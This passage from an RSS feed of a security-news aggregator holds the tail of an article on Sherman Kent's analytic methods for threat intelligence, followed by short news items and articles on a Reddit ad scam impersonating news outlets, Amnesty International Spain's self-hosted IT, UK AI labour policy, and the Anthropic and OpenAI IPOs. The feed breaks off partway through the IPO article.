Sherman Kent, Words of Estimative Probability: <a href="https://www.cia.gov/resources/csi/studies-in-intelligence/archives/vol-8-no-4/words-of-estimative-probability/">https://www.cia.gov/resources/csi/studies-in-intelligence/archives/vol-8-no-4/words-of-estimative-probability/</a></li><li>CIA, Words of Estimative Probability PDF: <a href="https://www.cia.gov/resources/csi/static/Words-of-Estimative-Probability.pdf">https://www.cia.gov/resources/csi/static/Words-of-Estimative-Probability.pdf</a></li><li>CIA, The Intelligence Process: A Digest from Strategic Intelligence by Sherman Kent: <a href="https://www.cia.gov/readingroom/document/cia-rdp78-04718a000600100003-3">https://www.cia.gov/readingroom/document/cia-rdp78-04718a000600100003-3</a></li><li>CIA, Sherman Kent and the Profession of Intelligence Analysis: <a href="https://www.cia.gov/resources/csi/static/Kent-Profession-Intel-Analysis.pdf">https://www.cia.gov/resources/csi/static/Kent-Profession-Intel-Analysis.pdf</a></li><li>ODNI, Intelligence Community Directive 203: Analytic Standards: <a href="https://www.dni.gov/files/documents/ICD/ICD-203.pdf">https://www.dni.gov/files/documents/ICD/ICD-203.pdf</a></li><li>CIA, A Tradecraft Primer: Structured Analytic Techniques for Improving Intelligence Analysis: <a href="https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdf">https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdf</a></li><li>Office of the Historian, Cuban Missile Crisis chronology and U-2 collection: <a href="https://history.state.gov/historicaldocuments/frus1961-63v11/d16">https://history.state.gov/historicaldocuments/frus1961-63v11/d16</a></li><li>National Archives, Aerial Photograph of Missiles in Cuba: <a href="https://www.archives.gov/milestone-documents/aerial-photograph-of-missiles-in-cuba">https://www.archives.gov/milestone-documents/aerial-photograph-of-missiles-in-cuba</a></li><li>DIA, Cuban Missile Crisis U-2 photo record: <a href="https://www.dia.mil/News-Features/Photo-Gallery/igphoto/2000948884/">https://www.dia.mil/News-Features/Photo-Gallery/igphoto/2000948884/</a></li><li>WMD Commission report index: <a href="https://govinfo.library.unt.edu/wmd/report/index.html">https://govinfo.library.unt.edu/wmd/report/index.html</a></li><li>WMD Commission report PDF: <a href="https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdf">https://www.govinfo.gov/content/pkg/GPO-WMD/pdf/GPO-WMD.pdf</a></li><li>WMD Commission transmittal letter: <a href="https://govinfo.library.unt.edu/wmd/report/transmittal_letter.html">https://govinfo.library.unt.edu/wmd/report/transmittal_letter.html</a></li><li>Senate Select Committee conclusions on Iraq WMD intelligence via GlobalSecurity mirror: <a href="https://www.globalsecurity.org/intell/library/congress/2004_rpt/iraq-wmd_intell_09jul2004_conclusions.htm">https://www.globalsecurity.org/intell/library/congress/2004_rpt/iraq-wmd_intell_09jul2004_conclusions.htm</a></li><li>9/11 Commission Report PDF: <a href="https://www.9-11commission.gov/report/911Report.pdf">https://www.9-11commission.gov/report/911Report.pdf</a></li><li>Office of Justice Programs, 9/11 Commission Report summary: <a href="https://www.ojp.gov/ncjrs/virtual-library/abstracts/911-commission-report-executive-summary">https://www.ojp.gov/ncjrs/virtual-library/abstracts/911-commission-report-executive-summary</a></li><li>ODNI, Iran: Nuclear Intentions and Capabilities, 2007 NIE: <a href="https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdf">https://www.dni.gov/files/documents/Newsroom/Reports%20and%20Pubs/20071203_release.pdf</a></li><li>CIA CSI, CIA Support to Policymakers: The 2007 NIE on Iran’s Nuclear Intentions and Capabilities: <a href="https://www.cia.gov/resources/csi/books-monographs/cia-support-to-policymakers-the-2007-nie-on-irans-nuclear-intentions-and-capabilities/">https://www.cia.gov/resources/csi/books-monographs/cia-support-to-policymakers-the-2007-nie-on-irans-nuclear-intentions-and-capabilities/</a></li><li>Mandiant, APT1: <a href="https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf">https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf</a></li><li>Google Cloud / Mandiant, APT28: <a href="https://cloud.google.com/blog/topics/threat-intelligence/apt28-a-window-into-russias-cyber-espionage-operations">https://cloud.google.com/blog/topics/threat-intelligence/apt28-a-window-into-russias-cyber-espionage-operations</a></li><li>CISA, SolarWinds AA20–352A: <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a">https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a</a></li><li>CrowdStrike, SUNSPOT: <a href="https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/">https://www.crowdstrike.com/en-us/blog/sunspot-malware-technical-analysis/</a></li><li>Microsoft, GoldMax, GoldFinder, and Sibot: <a href="https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/">https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/</a></li><li>CrowdStrike, StellarParticle observations: <a href="https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/">https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/</a></li><li>MITRE ATT&amp;CK: <a href="https://attack.mitre.org/">https://attack.mitre.org/</a></li><li>MITRE, MITRE ATT&amp;CK overview: <a href="https://www.mitre.org/focus-areas/cybersecurity/mitre-attack">https://www.mitre.org/focus-areas/cybersecurity/mitre-attack</a></li><li>Sqrrl / David Bianco, A Framework for Cyber Threat Hunting Part 1: The Pyramid of Pain: <a href="https://www.threathunting.net/files/A%20Framework%20for%20Cyber%20Threat%20Hunting%20Part%201_%20The%20Pyramid%20of%20Pain%20_%20Sqrrl.pdf">https://www.threathunting.net/files/A%20Framework%20for%20Cyber%20Threat%20Hunting%20Part%201_%20The%20Pyramid%20of%20Pain%20_%20Sqrrl.pdf</a></li><li>Mandiant, WannaCry malware profile: <a href="https://cloud.google.com/blog/topics/threat-intelligence/wannacry-malware-profile">https://cloud.google.com/blog/topics/threat-intelligence/wannacry-malware-profile</a></li><li>Mandiant, WannaCry use of EternalBlue: <a href="https://cloud.google.com/blog/topics/threat-intelligence/smb-exploited-wannacry-use-of-eternalblue/">https://cloud.google.com/blog/topics/threat-intelligence/smb-exploited-wannacry-use-of-eternalblue/</a></li><li>DOJ, North Korean regime-backed programmer charged in cyber attacks including WannaCry 2.0: <a href="https://www.justice.gov/archives/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and">https://www.justice.gov/archives/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and</a></li><li>Microsoft, NotPetya technical analysis: <a href="https://www.microsoft.com/security/blog/2017/10/03/advanced-threat-analytics-security-research-network-technical-analysis-notpetya/">https://www.microsoft.com/security/blog/2017/10/03/advanced-threat-analytics-security-research-network-technical-analysis-notpetya/</a></li><li>Cisco Talos, The MeDoc Connection: <a href="https://blogs.cisco.com/security/talos/the-medoc-connection">https://blogs.cisco.com/security/talos/the-medoc-connection</a></li><li>UK Government, Foreign Office Minister condemns Russia for NotPetya attacks: <a href="https://www.gov.uk/government/news/foreign-office-minister-condemns-russia-for-notpetya-attacks">https://www.gov.uk/government/news/foreign-office-minister-condemns-russia-for-notpetya-attacks</a></li><li>White House, Statement from the Press Secretary on NotPetya: <a href="https://trumpwhitehouse.archives.gov/briefings-statements/statement-press-secretary-25/">https://trumpwhitehouse.archives.gov/briefings-statements/statement-press-secretary-25/</a></li><li>DOJ, Six Russian GRU officers charged in connection with destructive malware including NotPetya: <a href="https://www.justice.gov/opa/pr/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-and">https://www.justice.gov/opa/pr/six-russian-gru-officers-charged-connection-worldwide-deployment-destructive-malware-and</a></li></ul><h3>Follow for practical cybersecurity research</h3><p>If you’re interested in <strong>Offensive security,</strong> <strong>AI security, real-world attack simulations, CTI, and detection engineering</strong> — this is exactly what I focus on.</p><p>Stay connected:</p><p>→ <strong>Subscribe on Medium:</strong> <a href="https://medium.com/@1200km">medium.com/@1200km</a><br>→ <strong>Connect on LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">andrey-pautov</a><br>→ <strong>GitHub — tools &amp; labs:</strong> <a href="https://github.com/anpa1200">github.com/anpa1200</a><br>→ <strong>Contact:</strong> <a href="mailto:1200km@gmail.com">1200km@gmail.com</a></p><h4>Andrey Pautov</h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=33142ad7553b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b">Applying Sherman Kent’s Analytic Discipline to CTI: A Practical Analyst Guide</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Claude Outage Data Leak, Microsoft GitHub Worm, IBM Hack, M Instagram Takeovers, Canada’s Bill C-8]]></title>
<description><![CDATA[TClaude Outage Data Leak Fears, Microsoft GitHub Worm, IBM Hack Allegations, Meta AI Instagram Takeovers, and Canada’s Bill C-8 David Shipley reports that Anthropic’s Claude suffered a roughly two-hour outage affecting models including Opus, during which a user alleged receiving…
Read more →
The ...]]></description>
<link>https://tsecurity.de/de/3580437/it-security-nachrichten/claude-outage-data-leak-microsoft-github-worm-ibm-hack-m-instagram-takeovers-canadas-bill-c-8/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580437/it-security-nachrichten/claude-outage-data-leak-microsoft-github-worm-ibm-hack-m-instagram-takeovers-canadas-bill-c-8/</guid>
<pubDate>Mon, 08 Jun 2026 06:37:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TClaude Outage Data Leak Fears, Microsoft GitHub Worm, IBM Hack Allegations, Meta AI Instagram Takeovers, and Canada’s Bill C-8 David Shipley reports that Anthropic’s Claude suffered a roughly two-hour outage affecting models including Opus, during which a user alleged receiving…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/claude-outage-data-leak-microsoft-github-worm-ibm-hack-m-instagram-takeovers-canadas-bill-c-8/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/claude-outage-data-leak-microsoft-github-worm-ibm-hack-m-instagram-takeovers-canadas-bill-c-8/">Claude Outage Data Leak, Microsoft GitHub Worm, IBM Hack, M Instagram Takeovers, Canada’s Bill C-8</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Reddit Ads Impersonate BBC and The Guardian to Push Fake AI Investment Schemes]]></title>
<description><![CDATA[A "growing wave" of Reddit's "promoted posts" are sending U.S. and European audiences to money-stealing scams that impersonate major news organizations including the BBC, the Financial Times, and The Guardian, according to new findings from Bitdefender Labs. 

"Domains are short-lived and rapidly...]]></description>
<link>https://tsecurity.de/de/3579528/it-security-nachrichten/reddit-ads-impersonate-bbc-and-the-guardian-to-push-fake-ai-investment-schemes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579528/it-security-nachrichten/reddit-ads-impersonate-bbc-and-the-guardian-to-push-fake-ai-investment-schemes/</guid>
<pubDate>Sun, 07 Jun 2026 16:53:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A "growing wave" of Reddit's "promoted posts" are sending U.S. and European audiences to money-stealing scams that impersonate major news organizations including the BBC, the Financial Times, and The Guardian, according to new findings from Bitdefender Labs. 

"Domains are short-lived and rapidly rotated to evade detection," they write, noting that the impersonating sites apparently even use language "to falsely imply that the investment platform had been reviewed, approved, or vetted" by the legitimate site they're impersonating:

The campaign promotes fake AI-powered investment platforms such as Wencoin STX, Warrior Coin AI, and Nevo Coin, using fabricated celebrity endorsements, cloned news websites, fake interviews, and invented financial success stories to lure victims into depositing money. Researchers Andrea Olariu and Emanuel Puscasu have identified multiple promoted Reddit posts masquerading as legitimate financial or breaking news stories. 
Some ads claimed that: 
 — NVIDIA and OpenAI were "creating the future"
 — Heathrow police discovered hundreds of thousands of pounds in cash
 — Governments and banks were allegedly trying to "hide" a revolutionary AI investment platform
 — European regulators were "silencing" articles about AI trading systems 

Some Reddit ads delivered in video format, including what appeared to be a deepfake BBC news segment featuring a news anchor presenting fabricated financial headlines... Examples observed by researchers included: 
 — Fake BBC pages discussing "$20 billion conversations" tied to AI investments
 — Fraudulent Financial Times articles about Heathrow airport cash seizures
 — Fake Guardian stories claiming governments were trying to suppress coverage of Wencoin STX or Nevo Coin 

The pages featured fabricated interviews, fake profit screenshots, manipulated banking documents, false testimonials, and even fictional journalists or business editors designed to make the scam look legitimate. In many cases, the content sought to create a sense of exclusivity or conspiracy, suggesting that banks, regulators, or governments were trying to suppress public access to the investment platform... 

Our researchers found that after users clicked links embedded within the fake Guardian articles, they were redirected to a registration form allegedly used to create a "Nevo Coin" investment account. The form requested personal contact information, including the victim's name, email address, and phone number. To increase pressure and encourage immediate action, the page warned that registration availability was limited, claiming that once all spots were filled, new user registrations would be suspended. 

And in the final stage, they're asked to deposit money...<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Reddit+Ads+Impersonate+BBC+and+The+Guardian+to+Push+Fake+AI+Investment+Schemes%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F07%2F064204%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F07%2F064204%2Freddit-ads-impersonate-bbc-and-the-guardian-to-push-fake-ai-investment-schemes%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/06/07/064204/reddit-ads-impersonate-bbc-and-the-guardian-to-push-fake-ai-investment-schemes?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Labour will make AI ‘work for the workers’, says Liz Kendall]]></title>
<description><![CDATA[Technology secretary promises to support people whose jobs are swept away by automationLiz Kendall has insisted Labour will make artificial intelligence “work for workers”, and not abandon people whose jobs are swept away by its rapid advance.With public fears mounting about the impact of AI on e...]]></description>
<link>https://tsecurity.de/de/3576119/ai-nachrichten/labour-will-make-ai-work-for-the-workers-says-liz-kendall/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576119/ai-nachrichten/labour-will-make-ai-work-for-the-workers-says-liz-kendall/</guid>
<pubDate>Fri, 05 Jun 2026 19:03:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Technology secretary promises to support people whose jobs are swept away by automation</p><p>Liz Kendall has insisted Labour will make artificial intelligence “work for workers”, and not abandon people whose jobs are swept away by its rapid advance.</p><p>With public fears mounting about the impact of AI on employment, particularly for young people, the technology secretary claimed that the government could shape the way it is adopted.</p> <a href="https://www.theguardian.com/technology/2026/jun/05/labour-will-make-ai-work-for-workers-liz-kendall">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic's bizarre call for everyone to slow down on AI is a pipe dream — here's why that will never happen]]></title>
<description><![CDATA[Anthropic's fears about recursive development are well-founded, but its idea for how to control it is laughable.]]></description>
<link>https://tsecurity.de/de/3575805/it-nachrichten/anthropics-bizarre-call-for-everyone-to-slow-down-on-ai-is-a-pipe-dream-heres-why-that-will-never-happen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575805/it-nachrichten/anthropics-bizarre-call-for-everyone-to-slow-down-on-ai-is-a-pipe-dream-heres-why-that-will-never-happen/</guid>
<pubDate>Fri, 05 Jun 2026 17:32:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Anthropic's fears about recursive development are well-founded, but its idea for how to control it is laughable.]]></content:encoded>
</item>
<item>
<title><![CDATA[How digital sovereignty shapes Amnesty International Spain’s tech model]]></title>
<description><![CDATA[Transformation of an organization is no longer measured solely in terms of productivity, automation, or the adoption of new tools. In nonprofits like Amnesty International Spain, technology has also become a matter of independence, privacy, and the ability to act autonomously.



For over 14 year...]]></description>
<link>https://tsecurity.de/de/3574990/it-security-nachrichten/how-digital-sovereignty-shapes-amnesty-international-spains-tech-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574990/it-security-nachrichten/how-digital-sovereignty-shapes-amnesty-international-spains-tech-model/</guid>
<pubDate>Fri, 05 Jun 2026 12:08:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Transformation of an organization is no longer measured solely in terms of productivity, automation, or the adoption of new tools. In <a href="https://www.cio.com/article/4139229/nonprofits-shaping-the-future-of-responsible-ai.html?utm=hybrid_search">nonprofits</a> like Amnesty International Spain, technology has also become a matter of independence, privacy, and the ability to act autonomously.</p>



<p>For over 14 years, the Spanish branch of the organization has operated with a clear premise to minimize its dependence on large technology platforms, and maintain control over its data, systems, and communications. This strategy, amid the ongoing European debate on digital sovereignty and AI, is taking on a new dimension. “From the ground up, we have a policy of being technologically independent, hosting as much as possible ourselves to ensure we have no problems suing any company, or that any report we publish doesn’t affect the systems we work with,” says head of IT infrastructure Carlos López Belenguer.</p>



<p>Having worked like this long before concepts such as digital sovereignty became a regular part of the European tech debate, people are now discussing it more. “I think it’s a powerful and quite appropriate term,” he says.</p>



<h2 class="wp-block-heading">Technology to avoid dependence on big tech</h2>



<p>Amnesty International Spain’s tech strategy has focused on finding free software alternatives and self-hosted systems that allow them to maintain control over their infrastructure. “One of the great advantages of free software is we aren’t dependent on any company to work,” says Belenguer, adding it’s especially important in an organization dedicated to defending human rights, so it can denounce or investigate any company knowing it won’t face retaliation regarding the use of software.</p>



<p>In his view, the current geopolitical context and some recent moves by large technology companies further reinforce this philosophy. “It’s no coincidence Microsoft is withdrawing a significant portion of its licensing model for NGOs right after Donald Trump said none of its suppliers could have certain policies that went against his administration’s philosophy,” he says.</p>



<p>Belenguer adds that these types of changes can create significant economic and technological problems for organizations that depend entirely on external platforms. “When you already have your entire infrastructure in place, you don’t have many options to switch to the competition, because you’re really intertwined,” he says.</p>



<h2 class="wp-block-heading">Providing the means</h2>



<p>A prime example of this strategy has been implementing Nextcloud as an internal collaborative work platform. But Belenguer’s relationship with this tool began years before its deployment within the organization. “I was already familiar with the software and had been following it for years,” he says.</p>



<p>At that time, Amnesty International Spain was still working with local file servers, and solutions like Microsoft 365 and Microsoft SharePoint were just beginning to spread. “Like many others, we worked with a file system on a local server in the office,” he says. “Everyone went to work in person, and the whole Office 365 movement was just starting to emerge.”</p>



<p>However, the organization decided to explore another option. “I proposed Nextcloud because I was already familiar with it, had considerable experience with <a href="https://www.cio.com/article/4139444/open-source-isnt-altruism-its-how-you-avoid-getting-surprised.html?utm=hybrid_search">open-source software</a>, and we already had quite a few things hosted,” he says. “In the end, it was just a matter of launching one more product.”</p>



<p>The implementation began with a small pilot test with five users, which later grew to 10, and then 30. But the major turning point came with the pandemic in 2020 and the rise of remote work. “By then, we already had it up and running in production with everyone using it,” Belenguer says. “It practically saved our lives in IT.”</p>



<p>The tool evolved from a simple file-sharing system into a collaborative work platform. “When people saw they could edit documents concurrently and work together seamlessly, they began to find many more uses for it,” he says.</p>



<h2 class="wp-block-heading">Privacy, flexibility, and control</h2>



<p>Beyond functionality, Belenguer says the main differentiating value of these types of solutions is control over infrastructure and data. “The only real way today to guarantee privacy when working with big tech is to leave big tech,” he says.</p>



<p>In this way, he expresses a particularly critical view of how large tech platforms handle personal data. “Microsoft seeks to create a general profile of everyone who works with or uses a computer,” he says, adding that the increasing integration of digital services, accounts, and tools is generating a massive collection of information about users. “All this is done under the guise of improving security or ensuring a better user experience.”</p>



<p>Free software, on the other hand, offers a more flexible and secure alternative. “Being your own Google without compromising user privacy and documents, and being technologically independent is a huge leap,” he says.</p>



<p>In addition to privacy, the adaptability offered by working with one’s own infrastructure is also key. “We’ve had much more flexibility both in managing the platform and in recovering lost data, as well as enabling different ways of working,” he says.</p>



<p>Despite its commitment to technological independence, Amnesty International Spain acknowledges that some dependencies remain difficult to overcome, so certain tools from major tech companies have become de facto standards. “A big commitment I feel we have to make is to use Teams,” says Belenguer. “Many people don’t realize an alternative exists.” Still, he adds the organization has achieved a high degree of technological autonomy. “I’d say we’re at about 70% independent,” he says. “If the US cuts the cord, we believe we could continue working practically without problems.”</p>



<h2 class="wp-block-heading">AI: opportunity and concern</h2>



<p>Regarding AI, Amnesty International Spain has developed internal <a href="https://www.cio.com/article/4095393/6-strategies-for-cios-to-effectively-manage-shadow-ai.html?utm=hybrid_search">policies to limit use of external tools with sensitive data</a>. “We’ve developed policies to ensure personal data is neither shared nor fed into any AI controlled by a large company,” he says.</p>



<p>At the same time, the nonprofit is working on projects to deploy its own self-hosted models that can offer users tools with which to process personal data without compromising sensitive information. Among the projects under development are those related to videoconferencing, transcription, and voice and text analysis and synthesis. “We’re aiming for a hybrid model in which certain tasks can be performed with external tools, and others require our own infrastructure,” he says.</p>



<p>Belenguer understands AI will continue to profoundly transform the work of organizations. “There’s practically no aspect of our work that won’t be affected,” he adds. Despite this, he believes this very transformation makes maintaining technological control even more important. “It’s a very good time to try to become technologically independent and control most of our systems,” he says.</p>



<h2 class="wp-block-heading">A cultural shift that has already begun</h2>



<p>Belenguer acknowledges those who opted to maintain their own infrastructure and reduce dependence on large technology platforms were seen as oddities. “For a long time, we felt quite alone doing this,” he says. But he believes the current context is driving a change in mindset. “In the last two years, though, we’ve seen a major ideological shift. There’s constant and enthusiastic talk about digital sovereignty, hosting your own systems, and owning your data.”</p>



<p>This shift confirms the path the organization embarked on years ago made sense. “Now we realize we were largely right and we’ve done the necessary thing,” he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA['Workers’ trust in a recognisable corporate logo has been broken': 2 in 3 workers are ditching big corporations for small businesses]]></title>
<description><![CDATA[Workers are being pushed away from Big Tech and international enterprises over redundancy fears and a lack of trust]]></description>
<link>https://tsecurity.de/de/3574951/it-nachrichten/workers-trust-in-a-recognisable-corporate-logo-has-been-broken-2-in-3-workers-are-ditching-big-corporations-for-small-businesses/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574951/it-nachrichten/workers-trust-in-a-recognisable-corporate-logo-has-been-broken-2-in-3-workers-are-ditching-big-corporations-for-small-businesses/</guid>
<pubDate>Fri, 05 Jun 2026 11:46:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Workers are being pushed away from Big Tech and international enterprises over redundancy fears and a lack of trust]]></content:encoded>
</item>
<item>
<title><![CDATA[California Businessman Accused of Selling Restricted Technology to Iran]]></title>
<description><![CDATA[Jamshid Ghomi, of Newport Coast, Calif., was charged with conspiracy to violate the International Emergency Economic Powers Act.]]></description>
<link>https://tsecurity.de/de/3574013/it-security-nachrichten/california-businessman-accused-of-selling-restricted-technology-to-iran/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574013/it-security-nachrichten/california-businessman-accused-of-selling-restricted-technology-to-iran/</guid>
<pubDate>Fri, 05 Jun 2026 00:21:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jamshid Ghomi, of Newport Coast, Calif., was charged with conspiracy to violate the International Emergency Economic Powers Act.]]></content:encoded>
</item>
<item>
<title><![CDATA[What Anthropic and OpenAI IPOs spell for CIOs’ AI budgets]]></title>
<description><![CDATA[AI pioneers Anthropic and OpenAI both appear to be headed toward IPOs, leaving IT leaders whose organizations rely on their AI models wondering what might be in store for them.



Top of mind is the possibility of higher costs for enterprise use, especially for frontier models.



By offering sto...]]></description>
<link>https://tsecurity.de/de/3572152/it-nachrichten/what-anthropic-and-openai-ipos-spell-for-cios-ai-budgets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572152/it-nachrichten/what-anthropic-and-openai-ipos-spell-for-cios-ai-budgets/</guid>
<pubDate>Thu, 04 Jun 2026 12:17:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI pioneers Anthropic and OpenAI both appear to be headed toward IPOs, leaving IT leaders whose organizations rely on their AI models wondering what might be in store for them.</p>



<p>Top of mind is the possibility of higher costs for enterprise use, especially for frontier models.</p>



<p>By offering stock for sale, the two AI innovators will likely raise hundreds of millions of dollars to invest in their products and pay their bills. But many observers worry that by shifting their focus from private, research-focused organizations to publicly traded companies, both Anthropic and OpenAI will be under new pressure to turn a profit.</p>



<p>OpenAI’s enterprise customers should expect substantial price increases after an IPO, especially those who are leaning hard on API usage, copilots, agents, and custom deployments, says <a href="https://www.linkedin.com/in/marknvena/" rel="nofollow">Mark Vena</a>, CEO and principal analyst at IT research firm SmartTech Research.</p>



<p>Vena sees an Anthropic IPO landing differently, with the company’s broad focus on AI safety. “It is selling enterprise trust, safety, developer productivity, and a more buttoned-up brand of AI that CFOs and CIOs can actually explain to their boards,” he says. “Frankly, I think OpenAI is the cultural rocket ship, but Anthropic is shaping up as the institutional AI bet.”</p>



<p>Still, there are concerns about Anthropic’s ability to generate profits, he adds.</p>



<p>“Let’s face it: The big question for Anthropic is whether public investors will reward discipline or punish the brutal economics of frontier AI,” he adds. “Training models, renting compute, and keeping pace with OpenAI, Google, Meta, and xAI is insanely expensive, so Anthropic will have to prove it is more than a very elegant cash-burning machine.”</p>



<p>Anthropic <a href="https://www.cnbc.com/2026/06/01/anthropic-ipo-s1-prospectus.html?msockid=2a6c16066e436d7a193b004b6f656c25" rel="nofollow">announced that it had filed</a> for an IPO on June 1 after news reports that OpenAI was also headed in that direction. Though OpenAI declined to comment on a potential IPO, news reports suggest that the company will <a href="https://techcrunch.com/2026/05/20/openai-barrels-toward-ipo-that-may-happen-in-september/" rel="nofollow">announce one within the next few weeks</a>, with the initial stock sale potentially happening in September.</p>



<p>IPOs would bring several other changes, Vena notes, including more transparency, more scrutiny, and more enterprise discipline around governance, uptime, security, and roadmap commitments. But new pricing models are likely as well.</p>



<p>“An OpenAI IPO would turn the company from a fast-moving AI lab into a Wall Street–monitored platform vendor,” Vena says. “Users should expect less ‘move fast and surprise everybody’ energy and more pressure to package, meter, and monetize everything.”</p>



<h2 class="wp-block-heading">End of the research lab model</h2>



<p>Other observers express similar fears about OpenAI’s pricing models after an IPO.</p>



<p><a href="https://www.linkedin.com/in/leoderikiants/" rel="nofollow">Leo Derikiants</a>, CEO and cofounder at AI research firm Mind Simulation Lab, says IT leaders should expect steep API price hikes, the introduction of expensive premium enterprise tiers for basic data privacy, and increasingly opaque billing models.</p>



<p>“An OpenAI IPO signals the end of the ‘research lab’ illusion and the birth of a traditional tech monopoly,” he adds. “Public markets demand predictable, escalating revenue, but OpenAI’s core technology — autoregressive LLMs — is fundamentally unpredictable and probabilistic.”</p>



<p>Anthropic, meanwhile, seems to be headed toward an IPO in a stronger, more defensible position than OpenAI, he says. While both companies rely on similar probabilistic and autoregressive architectures, Anthropic has focused less on consumer-facing toys such as video generation and more on the corporate enterprise market, giving the company a stable revenue foundation, he notes.</p>



<p>The Anthropic IPO announcement, however, also confirms a disappointing truth — that the AI market is driven by herd mentality, Derikiants says.</p>



<p>“The major labs are running in circles, building the exact same probabilistic products with different branding, without questioning the architectural limits or the actual long-term value,” he says. “The industry has completely lost the original plot. The foundational goal used to be achieving true artificial general intelligence (AGI). Today, the only goal is maximizing monthly subscription revenue.”</p>



<p>CIOs should prepare for aggressive vendor lock-in tactics, forced ecosystem bundling, and a shift away from flexible, open-source-friendly initiatives, he predicts. The corporate focus will pivot from creating safe AI to trapping enterprise data within the company’s proprietary API walls to maximize shareholder value, he says.</p>



<p>AI vendors caught in an AI scaling trap, with its architecture requiring exponentially more computing power and energy to yield marginal improvements in reasoning, he adds.</p>



<p>“Operating these models is fundamentally inefficient and heavily subsidized by venture capital,” he notes. “Once public, Wall Street will not tolerate those massive infrastructure losses indefinitely.”</p>



<p>After an IPO, customers of both companies should expect new pricing models to emerge, says <a href="https://www.linkedin.com/in/richardkamos/" rel="nofollow">Richard Amos</a>, CIO at systems integrator and cloud services provider Blue Mantis. An organization’s priorities change when it transitions from a startup to a publicly traded company, he adds.</p>



<p>“Before an IPO, the focus is largely on innovation, growth, and potential,” he says. “Once public, the expectations change and shareholders demand consistent quarterly performance, regulatory compliance, and enterprise-grade reliability.”</p>



<p>Amos expects several positive developments, with a greater emphasis on platform stability, security, compliance, and the development of more industry-specific capabilities after an OpenAI IPO.</p>



<p>At the same time, he expects AI vendors will move away from enterprise-wide licensing toward consumption-based pricing, mirroring trends in the public cloud market.</p>



